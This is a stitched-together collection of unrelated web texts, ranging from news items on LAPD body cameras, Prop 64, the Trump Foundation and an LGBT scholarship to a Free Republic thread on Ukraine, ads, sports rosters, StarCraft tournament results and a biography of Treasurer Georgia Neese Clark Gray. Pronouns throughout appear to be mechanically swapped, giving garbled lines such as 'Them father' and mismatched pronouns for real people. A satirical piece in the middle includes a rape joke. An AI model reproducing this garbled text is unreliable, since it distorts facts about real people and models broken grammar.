Someone over at Freedom Finance -- a loan broker based in the U.K. -- has put together a very nice infographic ranking each influential families from the Seven Kingdoms of Westeros by their assets.
They turned George R.R. Martin's A Song of Ice and Fire's Gold Dragons, Silver Stags and Copper Stars into pounds sterling -- using a rather funny conversion rate involving not only cows, but dragons, as well.
So who's making the big bucks? Coming in first rank is (not surprisingly) none other than Tywin Lannister himself, with a net worth of £6 billion in assets (not bad for a family that always pays its debts).
Check out which other Game of Thrones families and/or characters have made it to the top 10.
(Freedom Finance via Winter Is Coming)
Brisbanes The Finest Floors
Welcome to Brisbanes Finest Floors, the flooring specialists for homes and offices across Brisbane and beyond. You can rest assured you are in great hands as we are fully licensed with QBCC Licence Number 1098439 and a member of Australian Timber Flooring Association we also hold a Government approved Blue Card. Brisbanes The Finest Floors can sand and polish timber floors, parquetry and cork tiles we also specialise in deck maintenance, deck sanding, and deck oiling and staining.
With over 20 years' experience, we're experts at seeing the things you might not see! Chances are you might not recognise the hidden potential of the timber floor or wooden deck beneath your feet. You see a scuffed, scratched or worn floor? We see a diamond in the rough, brimming with the potential to deliver the ‘wow' factor you've been looking for.
You see dull floorboards? We see the beauty, lustre and depth of colour that only polished timber can achieve.
You see a weathered deck? We see its potential to become a stylish and contemporary outdoor area, the focal point of your outdoor entertaining space and the envy of all your neighbours.
What better way to bring out the natural beauty of your timber floor or wooden deck than to have it expertly sanded, polished or restored? It's a quick and incredibly cost-effective way to add value to your home. We're the experts in timber floor restoration, floor polishing and deck restoration. We don't just promise exceptional workmanship and the highest quality finish at a great price. We deliver, Brisbanes Finest Floors.
Salem, Mo. Native Counters Anti-Gay Flag Vote with LGBT Scholarship
It's been an interesting 24-hours since news broke that the Dent County Commission in Southeast Missouri voted to fly flags at its Courthouse and Judicial Building at "below half-staff" - in "mourning" over last month's U.S. Supreme Court decision legalizing same-sex marriage nationwide.
The rebuke of the vote in news reports and on social media was swift and varied - leading to today's announcement that the commission will meet to rescind their decision "out of respect for veterans and those currently serving in the military."
The controversy has also inspired one Dent County LGBT native to create a $1,000 "Courage Scholarship" to be granted to a graduating from high school senior who "has demonstrated or shows great potential to work for change in their community that advances the lives of lesbian, gay, bisexual and transgender (LGBT) people and other groups that have historically faced discrimination and been pushed to society's margins."
Jacob Wilson, a 2004 graduate of Salem High School, thought of the idea of a scholarship for Dent County teens after reading the news reports last night.
"The vote was disheartening, especially having witnessed so much progress across the country," said Wilson. "And while I'm glad the commission is rescinding their decision, not one of the three officials seem to realize the harm their actions have on young LGBT people who live in their communities."
"They apologized for offending veterans but have offered no apologies for their act of discrimination," Wilson continued. "Rather than sit back and be angry, I decided it was time to take action and help LGBT kids back home because I've been in their shoes. For me, it is important to increase visibility of LGBT issues in my hometown of Salem so that LGBT youth receive positive messages of acceptance and love and to know that there is a network in the community and across the country that has their backs, even if local leaders don't. And the Courage Scholarship will do just that."
Wilson has been living in Washington, D.C. for the past four years having worked in the LGBT resource centers at George Washington and American Universities and is in the process of moving to Tucson where he'll be a PhD student in Higher Education at the University of Arizona.
"The Courage Scholarship, to me, is a great way to promote the importance of education while sending a message to the entire Salem community that discrimination and hate are not acceptable," they said.
While the idea is in its infancy, Wilson has already reached out to Missouri LGBT organizations to help run the scholarship, which will be crowded funded. A link can be found here.
In addition to supporting LGBT students, Wilson also knows the importance of empowering straight allies. To that end, they are in contact with their former school district to develop and deliver LGBT Safe Zone Training.
"If the school district accepts, I will be happy to train teachers, administrators, and students alike in hopes that, together, we can create a safer environment where LGBT students can both learn and be engaged members of their campus community," said Wilson.
LOS ANGELES -- Every Los Angeles police officer will soon be equipped with a body camera, Mayor Eric Garcetti announced Tuesday.
Garcetti said at a press conference that the department will buy 7,000 on-body cameras for Los Angeles Police Department officers to expand transparency and accountability.
"The trust between a community and its police department can be eroded in a single moment," Garcetti said. "Trust is built on transparency."
The announcement comes two weeks after President Barack Obama announced a $363 million package that includes $75 million to pay half the cost of 50,000 officer-mounted cameras. The technology has been widely endorsed as a reform following the death of Michael Brown, an unarmed black teenager killed by Ferguson, Missouri, police officer Darren Wilson in August.
"No big city department has done this," LAPD Chief Charlie Beck said at the press conference. "Officers will have tremendously powerful evidence and the ability to collect it. We are starting a journey that will go on for decades."
Beck said they didn't expect that the cameras would be recording all the time. For example, cameras would not be used when officers interview victims of sexual abuse, but would likely be used when a suspect is in custody. Policies on proper use of the cameras will be considered in early 2015. The mayor's office said the city hopes to deploy the first 800 cameras within six months.
LAPD is not alone in its interest in officer-worn cameras. Police departments in Chicago, New York, Minneapolis and Washington, D.C., as well as in smaller cities like Ferguson, have started pilot programs with cameras or have announced plans to do so.
Police reform advocates have long called for police body cameras, arguing that the video can help eliminate bias and uncertainty when allegations of misconduct arise. One frequently cited officer body camera pilot program in Rialto, California, found that the number of complaints filed against officers fell by 88 percent and use of force by officers fell by almost 60 percent in the first year police used the cameras.
Garcetti's new plan would expand an LAPD pilot program that began early this year involving 600 officer-mounted cameras.
The announcement comes more than four months after Ezell Ford, a 25-year-old mentally ill man, was shot to death by LA police in a South LA neighborhood, just days after Brown was killed in Ferguson. Like the Brown case, eyewitness and police accounts of Ford's death vary.
Police have said that during an Aug. 11 "investigative stop," a struggle ensued in which Ford tried to grab an officer's gun and another officer fired at Ford.
Skip to comments.
Column of Russian military equipment breaks through to Luhansk - NSDC
Posted on by WhiskeyX
KYIV, August 15 /Ukrinform/. A column of Russian military equipment, on Friday, crossed the border of Ukraine in the area of Izvaryne checkpoint, trying to break through to help militants in besieged Luhansk.
Spokesman of the NSDC Information-Analytical Center Andriy Lysenko said, LIGABusinessInform reports.
When asked why the column was not destroyed from the air, Lysenko said that this border area is not controlled by the ATO.
"But I assure you that what has got here, will not be released," they said.
The number of technique and composition of the column is specified, according to the NSDC.
To remind, on Friday night, journalist of the British newspaper Guardian reported that in their eyes the column of 20 Russian armored vehicles and army trucks crossed the Russian-Ukrainian border in the region of Donetsk, Rostov region. According to him, Western journalists for the first time saw the movement of Russian military equipment to Ukraine.
Later, the NSDC confirmed this information.
TOPICS:
Foreign Affairs
News/Current Events
Russia
KEYWORDS:
invasion
luhansk
russia
ukraine
ukrainecrisis
To: WhiskeyX
“breaks through” what pray tell?
by 2 posted onby yldstrk ( My heroes have always been cowboys)
To: yldstrk
East of Brussels ‏@EastOfBrussels #Russia invasion of #Ukraine: #Putin's tanks en route to #Donetsk - #moscow #kremlin #sanctions #crimea #gazprom #war pic.twitter.com/8BIsqO1EHT https://twitter.com/EastOfBrussels/status/500207078083158016
To: WhiskeyX
According to him, Western journalists for the first time saw the movement of Russian military equipment to Ukraine. Ukraine is full of Russian military equipment, what other equipment would they have, Duh.
by 4 posted onby BerryDingle (I know how to deal with communists, I still wear their scars on my back from Hollywood-Ronald Reagan)
To: WhiskeyX
Vostok battalion in Ukrainian Donetsk: Bojan PancevskiVerified account ‏@bopanc Streets of #Donetsk today: artillery battle looming #Ukraine pic.twitter.com/MJe9cSuSlB https://twitter.com/bopanc/status/500200205518508034
To: WhiskeyX
Roland Oliphant ‏@RolandOliphant · 15m Massive column of APCs flying Russian flags and some with мc - peacekeeper - driving past aid convoy and barrelling it toward Donetsk https://twitter.com/search?q=Donetsk&src=typd
To: WhiskeyX
See the photographs: ConflictReporter ‏@MiddleEast_BRK It is simply unthinkable how much fire power Russian invaders and army used vs. Ukr. forces in southern #Donetsk ... pic.twitter.com/owEdEMYOZ1 https://twitter.com/MiddleEast_BRK/status/500241358771462144/photo/1
To: WhiskeyX
Wait, is it in Luhansk or on the way to Luhansk? It was only yesterday for the first time that the Ukraniam army announced the tenative capture of Novosvitlivka, which would give them a sort-of blockade on the town (before that, hardware could just drive straight in on the M-04). And who knows how well they'll even be able to hold the town if a strong convoy approaches it, the southern ATO forces against Luhansk aren't very strong (it'd help if the northern forces could manage to circle down on the east side but that's not helped by the fact that Russian forces from the Stakhanov area have been hitting their rear). And yes, it is really disturbing how much hardware Russia has thrown into this, and continues to throw in at an ever-increasing pace.
To: OldGuard1
Shaun Walker ‏@shaunwalker7 · Aug 14 We have arrived at the turnoff towards Krasnodon and Luhansk, Ukraine... The front of the Russian aid convoy is turning down it. Wow...
To: OldGuard1
3 minutes ago
Poroshenko: part of Russian armored vehicles were destroyed [Don't know if they are referring to Luhansk or Ukrainian Donetsk]
To: WhiskeyX
Fox business is reporting that Ukraine has destroyed part of the Russian convoy “sitting on the border.” I wonder if they are confusing this convoy with the supposed aide convoy of big white trucks?
To: WhiskeyX
They better call off their dogs soon, as the Russian “rebels” are actively shelling along the M-04 near Luhansk, trying to retake the road to the city.
To: Truth29
ConflictReporter ‏@MiddleEast_BRK There are #rumors since 2 hours of direct battles between Rus and Ukr troops in eastern Luhansk. But I can't confirm,so we should keep calm https://twitter.com/MiddleEast_BRK/status/500295894949167105
To: WhiskeyX
And so it starts.... Watch as Putin addresses the nation and the Red Air Force comes in to the fight. The war could be on in a few hours.
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.
FreeRepublic , LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2008 John Robinson
California's Proposition 64 to legalize recreational marijuana is going to have a big influence on the rest of the United States.
It is highly likely the measure will pass Tuesday. On Oct, 16, a SurveyUSA poll showed 51% in favor and 40% against. More recently, a USC Dornsife/Los Angeles Times poll showed 58% for and 34% against the ballot measure.
Jessica Rabe, research associate Convergex, a global brokerage company based in New York, said that the great size of the California economy -- sixth largest in the world if it were a standalone country, with GDP of $2.5 trillion in 2015 -- will "put pressure on the government to reclassify or deschedule the drug to help 'cannabusinesses' better conduct their operations with more access to banking services.”
According to cannabis investment company MedMen, passage of Proposition 64 could add $8.38 billion in annual sales to an already robust medical market worth an estimated $2.83 billion. CEO Adam Bierman said that the California vote is one of the major milestones in the institutionalization of the marijuana industry. “I have a meeting on Tuesday in San Francisco with half a dozen of what some people would refer to as the illuminati of Silicon Valley,” said Bierman. “That meeting doesn't happen six months ago. That meeting doesn't happen two months ago. It's happening now."
Sarah Trumble of Third Way, a think tank based in Washington, D.C., sounds a cautionary note. "I've heard that saying, if California goes then this inevitable that all states will go, but that's not necessarily true,” they said. “California didn't do a very good job with its medical marijuana industry and its lack of regulation. If they screw up recreational, it will hurt the overall effort.”
Trumble believes that if the analysts are right in their sales estimates and the industry becomes a multi-billion dollar one, then the big banks will reluctantly begin working with these customers. They noted that the amounts of money are so large that it wouldn't be feasible to work only in cash and the smaller banks and credit unions could be overwhelmed. It could be the tipping point for major financial institutions.
"The exponential increase in mainstream venture capital interest will attract talent from the established industries that the state has long supported from tech to aerospace and agriculture, which will be a boon for innovation and job creation across the diverse spectrum of cannabis companies,” said Mike Bologna, Chief Executive Officer of Green Lion Partners. “The potential economic impact of Prop 64 cannot be understated, and we hope that a victory in California will inspire other state governments to reconsider their archaic and destructive stance on cannabis."
California tends to be a trendsetter on issues like this,” said Ryan Lowther, a lawyer who chairs the Cannabis Industry Practice at regional law firm Farella Braun + Martel. They think the sheer size of California's market could influence other large states like Texas.
Isaac Dietrich, CEO of MassRoots, a cannabis social media site, said, “If California, which is 12% of the United States population, votes to legalize cannabis on Tuesday, it will greatly accelerate the passage of pro-cannabis laws in other states. For decades, California has led the country in social progress and we believe this initiative could lead to a medical cannabis law on the books in all 50 states by 2020.” Last week, Dietrich said MassRoots raised over $250,000 for legalization initiatives across the country, including $25,000 for Yes on 64. They added, “If California voters approve recreational cannabis, we expect it will generate millions of dollars in additional revenues for MassRoots annually.”
In addition to the financial and cultural aspects, there is also the feeling it will benefit the medical community. Rob Hunt, President of Teewinot Life Sciences, said, "California is the epicenter of biotechnology and there are many scientists that are desperate to study the efficacious nature of cannabinoids,” They went on to say, “Legalizing cannabis provides a great deal of insulation to these people and provides them comfort in conducting trials that will ultimately lead to breakthroughs in medicine. It is ironic that the passage of adult use may drive cannabinoid-based science far more than a medicinal law ever did.”
“While the economic benefits of fully legalizing marijuana for adults has been clearly articulated, I believe that one of the greatest social impacts that hasn't been publicized enough is that non-violent criminals who are in prison because of activities associated with cannabis will be released,” said Derek Peterson of Terra Tech Corp.. “Not only will this save the state taxpayer dollars, but it will allow these people a second chance to be productive members of society.”
Mathew Stang, Chief Revenue Officer of High Times Magazine, said, “Prop 64 includes many progressive measures aimed at helping small businesses grow and prosper, allowing everyone a chance at the American Dream, albeit a greener one than many might have imagined. We need a cannabis industry as progressive and inclusive as the cannabis movement to move past the prohibition era into a bright new future."
Donald Trump may finally have to answer some questions about their foundation's activities.
New York Attorney General Eric Schneiderman announced Monday that their office had sent a cease and desist letter to the Trump Foundation for operating without proper certification. The charity will no longer be allowed to raise money until it properly registers no later than October 15, the attorney general's office told The Daily Beast.
New York law dictates that any charity that solicits more than $25,000 a year needs to have a special registration prior to doing so. The attorney general's office also said that the Trump Foundation did not provide annual financial reports or audited financial statements.
Trump campaign spokesperson Hope Hicks said the investigation by Schneiderman, a Democrat, has "political motives," but that Trump would cooperate.
That means Trump, under penalty of perjury, will have to disclose more information about their charitable organization than they ever has before.
First, among other things, the foundation is required to file "all delinquent financial reports" from years when it was raising more than $25,000 and not registered to do so with the state, James Sheehan of the attorney general's office charities bureau, wrote the foundation.
Sheehan cites state law, which also requires the foundation show, among other things, whether its officers, directors and personnel have ever been fined or penalized from soliciting contributions or have been found to have engaged in unlawful practices.
In addition, it has to provide the names and addresses of professional fund raisers, fund raising counsels and commercial co-venturers who are acting on behalf of the organization.
Finally, it has to hand over a copy of its annual report for the preceding fiscal year and the names and addresses of chapters, branches and other organizations that share in the contributions or revenue raises in the state.
The coming disclosure may help clear up whether the Trump Foundation skirted the law or entirely ignored it over ever since they began running for president.
The trouble began with an event in January during which Trump collected contributions intended for veterans, which were diverted into their foundation. Trump later presented checks to veterans charities at their political rallies, which is in violation of rules that prohibit charities from being used for political purposes.
A series of investigative reports that followed from The Washington Post revealed that Trump had used foundation money to settle personal legal disputes, buy portraits of themselves and in one instance, funnel money to a political action committee supporting Florida's Republican attorney general, Pam Bondi.
If misconduct in the operation of the Trump Foundation can be proven, the consequences would range from fines to jail time. New York Attorney General Eric Schneiderman announced last month that their office was investigating Trump's charitable activities.
Schneiderman's investigation of the foundation began with questions about the $25,000 contribution from the foundation to the pro-Bondi PAC. After the contribution, Bondi opted not to join a lawsuit against Trump University. For using their charity to send money to a political organization, Trump later paid a fine to the Internal Revenue Service.
The foundation was subsequently alleged to be engaging in what could be construed as self-dealing, in which Trump used charitable donations to pay settle lawsuits brought against him, not the foundation.
Scheiderman and Trump have a lengthy history dating back to the initiation of a years-long investigation into Trump University, a defunct institution alleged to have scammed students out of money.
Trump and their team have long been dismissive of Schneiderman, claiming that they were politically motivated as a Democrat to take actions against the real estate mogul in the state. Schneiderman did in fact endorse Hillary Clinton but Trump has also given Schneiderman a great deal of money in the past. In February, Trump referred to the cases against them as being led by a “sleazebag law firm,” and alleged they could have easily settled but didn't want to.
Ironically, Trump has made the Clinton Foundation's dealing a major point of their campaign, hoping to milk a pay-to-play narrative out of their work. In August, Trump called for shutdown of the Clinton Foundation.
Theirs might end up going first.
Editor's note: The story has been updated throughout.
Being a guy feminist isn't easy, especially when you spend a lot of time around guys who aren't feminists—and as the joke goes, the more time you spend with guys who aren't feminists, the more you realize why all women hate guys.
Take my friend “Joe,” for example. Their name may not really be “Joe,” but to avoid potential lawsuits, let's call them “Joe.” He's a good guy at heart and I've known Joe since high school, but he's so sexist, it makes me want to shame them in front of their whole family on Facebook.
Joe looks at women like a butcher looks at a hunk of meat. Women are not real to Joe the carnivore, Joe the predator, Joe the devourer, Joe the potential rapist. To Joe's sexist mind, women don't have souls, only holes.
Joe's brain has been sculpted to hate women, their vaginas in particular—ironically, the same vaginas from which all male sexists are spat forth as they enter this man's world—by an undeniably patriarchal media/legal/educational complex that clearly needs to be dismantled.
Whenever you mention your recent conversion to male feminism, Joe scoffs and says it's because Cindy dumped you for a guy who drives a motorcycle, but you tell them that every life experience, especially with women, is a learning experience, and that if you'd only been nicer to Cindy and converted to male feminism like she'd been urging you, they wouldn't have fallen for the “bad boy” and had that whole meltdown where they started acting like they really aren't a feminist after all.
You've always thought that Joe was gross and creepy, but since you've decided to devote your life to becoming (never fully “being”—it's a perpetual process of becoming) a feminist ally, they seem grosser and creepier than ever, and you want to share important information with them about women that will make them a better man just for hearing it.
This is a handy and very effective five-point plan for converting sexist men to male feminism through a delicate balance of common sense and shaming.
1. Tell Him To Stop Making Sexist Comments
If Joe makes a sexist comment and there are no women around, say, “Joe, I think that was a sexist comment.” If there are women around, say, “Joe, I really think that was a sexist comment.” If they continue to make sexist comments, keep telling them to stop until they stop.
2. Tell Him It's Improper To Make Lewd Suggestions To Friends' Significant Others
Joe thinks you're “uptight” and “have a stick up your ass” and “need to chill out and have a drink” if you aren't constantly making rude, degrading comments about the anatomy of every female in sight. What Joe doesn't realize is that, in a very real way, they are a rapist. They rape the “safe space” that should be left undisturbed inside every woman's head. You must be stern with him, but do it while offering the hope of redemption: “Joe, I don't think the way you're speaking about Bob's wife's ass is very respectful to any of us, yourself included.”
3. Tell Him That Women Really Wouldn't Even Fuck Him If They Spoke Respectfully Toward Them
Joe's always talking about how all “bitches” are “sluts” and are “asking for it” and “really want it” and “like doing it a lot.” If Joe were a lot more attractive than they are, such comments would be forgivable—in many cases, perhaps even charming. But what makes Joe's comments so disgusting is the fact that Joe is physically repulsive and doesn't even realize it. Once you convince Joe that their “issues” with women stem from a lifetime of being rejected by them because they are not a desirable mate, you will break their will and thereby prepare them to become a dedicated and militant male feminist until the day they die.
4. Tell Him To Stop Laughing At Rape Jokes
Although most men will deny it, they all tell rape jokes and laugh at them when there are no women around. Tell Joe there's nothing funny about rape, there will never be anything funny about rape EVER, and that any man who laughs at rape jokes should be forcibly sodomized by a trained team of a dozen very muscular men. (Come to think of it, the idea of guys getting raped is kinda funny.)
5. Tell Him That Their Opinions End Where Everyone Else's Feelings Begin
Joe probably whines a lot about “censorship” and “free speech” and “the First Amendment” and “the Constitution,” but basically he's a baby who hides their fear behind tough but empty words. And if the little baby boy keeps running their mouth, if they keep shooting those poison darts that they call “words” at people, sooner or later someone will get hurt. And if someone gets hurt, then Joe will go to jail. And if Joe gets hurt in jail, that's the price of free speech. Free speech is not hate speech. Sorry, I think it's the other way around—hate speech is not free speech. Yeah. That's it. Tell Joe that it's fine if they want to have an opinion, but you will get them jailed unless they keep it to himself.
A new app has hit the iOS app store, with a unique anti-social selling point.
The app, called 'Cloak', scrapes social media sites such as Foursquare and Instagram so you can figure out where your friends are - and effectively avoid them. Cloak displays a map with the last known location of your friends (or enemies) so you can dodge any awkward run-ins; the app also has the option to send push notifications when someone you know is nearby.
According to its app store page, Cloak describes itself as "the antisocial network"; a welcome avoidance to social interaction in the hypersocial world. It even makes a nod to Google's famed private browsing setting, referring to itself as "Incognito Mode for real life".
Some have dismissed the app as a simple gimmick, but Cloak's creators maintain that it has a purpose. In an interview with the Washington Post, Cloak developer and former Buzzfeed creative director Chris Baker defended its use.
Personally, I think we've seen the crest of the big social network. Things like Twitter and Facebook are packed elevators where we're all crammed in together. I think anti-social stuff is on the rise. You'll be seeing more and more of these types of projects.
Cloak is currently free in the iOS app store, and while it isn't currently available for Android, its developers claim they will "expand the idea" if it proves to be a hit with users.
Source: BBC | Image via Apple app store
Islanders Roster
Goaltenders:
41 - Jaroslav Halak
60 - Kevin Poulin
Defensemen:
4 - TJ Brennan
8 - Griffin Reinhart
11 - Lubomir Visnovsky
14 - Thomas Hickey
52 - Ville Pokka
55 - Aaron Ness
Forwards:
15 - Cal Clutterbuck
17 - Matt Martin
18 - Ryan Strome
20 - Jack Skille
21 - Kyle Okposo
27 - Anders Lee
29 - Brock Nelson
51 - Frans Nielsen
53 - Casey Cizikas
59 - Brett Gallant
84 - Mikhail Grabovski
89 - Cory Conacher
91 - John Tavares
Hurricanes Roster
Goaltenders:
31 - Anton Khudobin
35 - Drew MacIntyre
Defense:
4 - Andrej Sekera
7 - Ryan Murphy
27 - Justin Faulk
44 - Jay Harrison
65 - Ron Hainsey
73 - Brett Bellemore
Forwards:
14 - Nathan Gerbe
16 - Elias Lindholm
18 - Jay McClement
19 - Jiri Tlusty
21 - Brock McGinn
22 - Zach Boychuk
23 - Ben Holmstrom
24 - Brad Malone
34 - Phil Di Giuseppe
36 - Patrick Brown
53 - Jeff Skinner
Fresh off a pair of wins in St. John's, Newfoundland, the New York Islanders are home to host the Carolina Hurricanes Wednesday at 7 p.m. in a preseason game at Nassau Coliseum.
The Islanders (2-0-0) beat the Ottawa Senators twice in a split-squad doubleheader on Monday and look to carry that momentum back to Long Island. Tonight's game will be streamed live on Islanders TV and broadcast on WRHU 88.7 FM. Great seats are still available.
Captain John Tavares, leading scorer Kyle Okposo and newcomer Mikhail Grabovski highlight the Islanders lineup. Grabovski scored a goal and an assist in Monday night's win against the Senators playing on a line with Cory Conacher and Nikolay Kulemin. Conacher is in tonight's lineup, while Kulemin is not.
Highlights: Islanders 3, Senators 2 (SO)
Jaroslav Halak and Kevin Poulin will be in goal for the Islanders. Poulin was credited with the win in the back half of Monday's doubleheader.Matt Martin, Ville Pokka and Aaron Ness are each making their preseason debuts Wednesday, as the rest of the lineup played in one of the two games on Monday.Jeff Skinner headlines the Hurricanes roster, along with defenseman Justin Faulk and goaltender Anton Khudobin. Brett Bellemore is the only Hurricane making their preseason debut. The Hurricanes (0-2-0) are looking for their first win of the preseason after dropping games to the Columbus Blue Jackets and Buffalo Sabres.
Participants [ edit ]
* Polt forfeited their spot in Code S due to them leaving South Korea for the United States, and so the spot was awarded to Stephano.[1]
Format [ edit ]
Round of 32: Dual Tournament format.
Best-of-3.
The 4 players of each group are split into two pairs and play each other .
and . The winners of these matches will then face each other in the Winner's match. The victor places first in the group and advances to the Round of 16. The losers of the initial matches face each other in the Loser's match. The loser places fourth in the group, will fall to Code A Round of 48. The loser of the Winner's match and the winner of the Loser's match will face each other in a fifth match. The winner gets second place in the group and advances to the Round of 16 .
. The loser places third in the group and will fall to Code A Round of 32.
Round of 16: Dual Tournament format.
Group Nominations.
Best-of-3.
The 4 players of each group in Round of 16 will face off similar to Round of 32 .
will face off similar to . Players who place 3rd and 4th in their group will fall to Code A Round of 24.
Quarterfinals: Single-elimination playoffs.
Players who reach Quarterfinals will retain their Code S status.
Quarterfinals: Best-of-5.
Semifinals: Best-of-7.
Finals: Best-of-7.
Group Stage (Ro32) [ edit ]
Group A [ edit ] Group A January 22, 2013 - 18:10 KST 1. Life 2-0 4-0 2. Symbol 2-1 4-3 3. Creator 1-2 3-4 4. ByuL 0-2 0-4 Group A Matches Creator 2 0 ByuL Symbol 0 2 Life Creator 0 2 Life ByuL 0 2 Symbols Creator 1 2 Symbol Group B [ edit ] Group B January 23, 2013 - 18:10 KST 1. MC 2-0 4-0 2. Curious 2-1 4-3 3. Leenock 1-2 2-4 4. TY 0-2 1-4 Group B Matches Leenock 2 0 TY Curious 0 2 MC Leenock 0 2 MC TY 1 2 Curious Leenock 0 2 Curious Group C [ edit ] Group C January 24, 2013 - 18:10 KST 1. Bomber 2-0 4-0 2. GuMiho 2-1 4-3 3. Sniper 1-2 3-5 4. HuK 0-2 1-4 Group C Matches Sniper 2 1 HuK Bomber 2 0 GuMiho Sniper 0 2 Bomber HuK 0 2 GuMiho Sniper 1 2 GuMiho Group D [ edit ] Group D January 25, 2013 - 18:10 KST 1. BBoongBBoong 2-0 4-1 2. Squirtle 2-1 5-3 3. HyuN 1-2 2-5 4. YoDa 0-2 2-4 Group D Matches HyuN 0 2 BBoongBBoong YoDa 1 2 Squirtle BBoongBBoong 2 1 Squirtle HyuN 2 1 YoDa Squirtle 2 0 HyuN Group E [ edit ] Group E January 29, 2013 - 18:10 KST 1. PartinG 2-0 4-1 2. LosirA 2-1 4-2 3. Ryung 1-2 2-5 4. ByuN 0-2 2-4 Group E Matches Ryung 0 2 LosirA ByuN 1 2 PartinG LosirA 0 2 PartinG Ryung 2 1 ByuN LosirA 2 0 Ryung Group F [ edit ] Group F January 30, 2013 - 18:10 KST 1. MarineKing 2-0 4-1 2. RorO 2-1 5-2 3. KeeN 1-2 2-5 4. Mvp 0-2 1-4 Group F Matches MarineKing 2 1 RorO KeeN 2 1 Mvp MarineKing 2 0 KeeN RorO 2 0 Mvp KeeN 0 2 RorO Group G [ edit ] Group G January 31, 2013 - 18:10 KST 1. Soulkey 2-0 4-0 2. TaeJa 2-1 4-3 3. Noblesse 1-2 3-5 4. NesTea 0-2 1-4 Group G Matches Soulkey 2 0 Noblesse NesTea 0 2 TaeJa Soulkey 2 0 TaeJa Noblesse 2 1 NesTea TaeJa 2 1 Noblesse Group H [ edit ] Group H February 1, 2013 - 18:10 KST 1. DongRaeGu 2-0 4-0 2. INnoVation 2-1 4-3 3. Stephano 1-2 3-4 4. Hack 0-2 0-4 Group H Matches INnoVation 2 0 Stephano Hack 0 2 DongRaeGu INnoVation 0 2 DongRaeGu Stephano 2 0 Hack INnoVation 2 1 Stephano
Group Stage (Ro16) [ edit ]
Group A [ edit ] Group A February 7, 2013 - 18:10 KST 1. INnoVation 2-0 4-1 2. TaeJa 2-1 5-3 3. DongRaeGu 1-2 3-4 4. Bomber 0-2 0-4 Group A Matches DongRaeGu 2 0 Bomber TaeJa 1 2 INnoVation DongRaeGu 0 2 INnoVation Bomber 0 2 TaeJa DongRaeGu 1 2 TaeJa Group B [ edit ] Group B February 8, 2013 - 18:10 KST 1. Soulkey 2-0 4-2 2. Symbol 2-1 4-3 3. Squirtle 1-2 3-4 4. MarineKing 0-2 2-4 Group B Matches Squirtle 2 0 Symbol MarineKing 1 2 Soulkey Squirtle 1 2 Soulkey Symbol 2 1 MarineKing Squirtle 0 2 Symbol Group C [ edit ] Group C February 14, 2013 - 18:10 KST 1. Curious 2-0 4-0 2. MC 2-1 4-2 3. GuMiho 1-2 2-5 4. LosirA 0-2 1-4 Group C Matches MC 0 2 Curious GuMiho 2 1 LosirA Curious 2 0 GuMiho MC 2 0 LosirA GuMiho 0 2 MC Group D [ edit ] Group D February 15, 2013 - 18:10 KST 1. RorO 2-0 4-2 2. PartinG 2-1 4-4 3. Life 1-2 4-4 4. BBoongBBoong 0-2 2-4 Group D Matches Life 2 0 PartinG BBoongBBoong 1 2 RorO Life 1 2 RorO PartinG 2 1 BBoongBBoong Life 1 2 PartinG
Playoffs [ edit ]
Bracket [ edit ]
Quarterfinals (Bo5) INnoVation 2 Symbol 3 Curious 3 PartinG 0 Soulkey 2 TaeJa 3 RorO 3 MC 2 Semifinals (Bo7) Symbol 4 Curious 2 TaeJa 1 RorO 4 Finals (Bo7) Symbol 2 RorO 4
Racial Distribution [ edit ]
Protoss Terran Zerg Random Round of 32 5 13 14 Round of 16 3 5 8 Quarterfinals 2 2 4 Semifinals 1 3 Finals 2 Winner 1
See also [ edit ]
Georgia Neese Clark Gray (January 27, 1898 – October 26, 1995) was the first woman Treasurer of the United States, serving from 1949 to 1953.[1]
Early life [ edit ]
Georgia Neese was born in Richland, Kansas, the daughter of Albert Neese, a farmer and business person, and Ella Sullivan Neese, a stay-at-home mother.[2] Them father, a self-made man, had prospered in the years before their birth and become the town's leading citizen, owning much of its property as well as the bank and general store. The family owned homes in Richland and in nearby Topeka where Neese attended high school graduating in 1917. Neese was a Presbyterian but they briefly attended Bethany College, an Episcopalian school for women in Topeka, before transferring to Washburn University.
Neese majored in economics at Washburn and was a member of several student organizations. They were president of the drama club and a member of the Upsilon chapter of Alpha Phi. Determined to become an actor, they moved to New York City following graduation in 1921 and enrolled at the Franklin Sargent School of Dramatic Art.
Acting career [ edit ]
Georgia Neese began their acting career with various stock companies. Gray pursued an acting career from 1921 to 1931, living in New York City, getting to know Helen Hayes and Charlie Chaplin, touring the country and earning $500 a week. When the Depression and the onset of "talkies," motion pictures with sound, cut short their stage career, they returned home to care for their sick father.
Family business [ edit ]
Gray started working at their father's Richland State Bank as an assistant cashier in 1935. At the death of their father in 1937, they inherited control and the presidency of Richland State Bank, as well as the family's general store, grain elevator, lumberyard, insurance agency, many farms and other real estate.
Political background [ edit ]
Gray was active in the state Democratic Party and was elected Democratic National Committee member from Kansas in 1936, a position they held until 1964. They were an articulate and well-liked representative of the party and an early supporter of Harry S. Truman. It was this support that brought about their nomination as the first woman to be Treasurer of the United States from 1949-1953.
Later career [ edit ]
The entire town of Richland was purchased by the U.S. Army Corps of Engineers in the late 1960s as a part of the land acquired for Clinton Lake. By 1974 the town was vacated and the remaining buildings were demolished shortly thereafter. After the project was announced, the Government was slow to proceed leaving property owners unsure if they should maintain their properties and unable to sell in order to relocate. Gray played a significant role in urging Congress to provide funds for the project so property owners could get on with their lives. They relocated the Richland State Bank to Topeka and renamed it Capital City State Bank, which was later changed to Capital City Bank. By the end of the twentieth century it had established several branches throughout the capital city.
Marriages [ edit ]
They acquired a manager named George M. Clark, who became their first husband in 1929. Although the marriage ended in a divorce in the mid-1940s, they continued to be known as Georgia Neese Clark for a time even after their second marriage. In 1953 they married Andrew J. Gray, a journalist and press agent.
Georgia Neese Clark Gray had no children.
Posthumous [ edit ]
Gray died on October 26, 1995, aged 97, and is interred at Pleasant Hill Cemetery, located at approximately 87th and Ratner Road, 1.5 miles south and 3 miles east of Berryton, Kansas.
The Georgia Neese Gray Performance Hall at the Topeka Performing Arts Center is named after them
The Georgia Neese Gray Award is reserved for presentation to Kansans who have served in elected office at the municipal and/or county level and who have performed outstanding service to their local community in the pursuit of the principles of the Kansas Democratic Party. Such service commends a lengthy and broad participation in public service endeavors to the city, county and state. This award shall be considered the highest honor which can be bestowed by the Kansas Democratic Party to its municipal and county elected officials.
On February 6, 2008 they were inducted into the Topeka Business Hall of Fame.
Clark's signature, as used on American currency
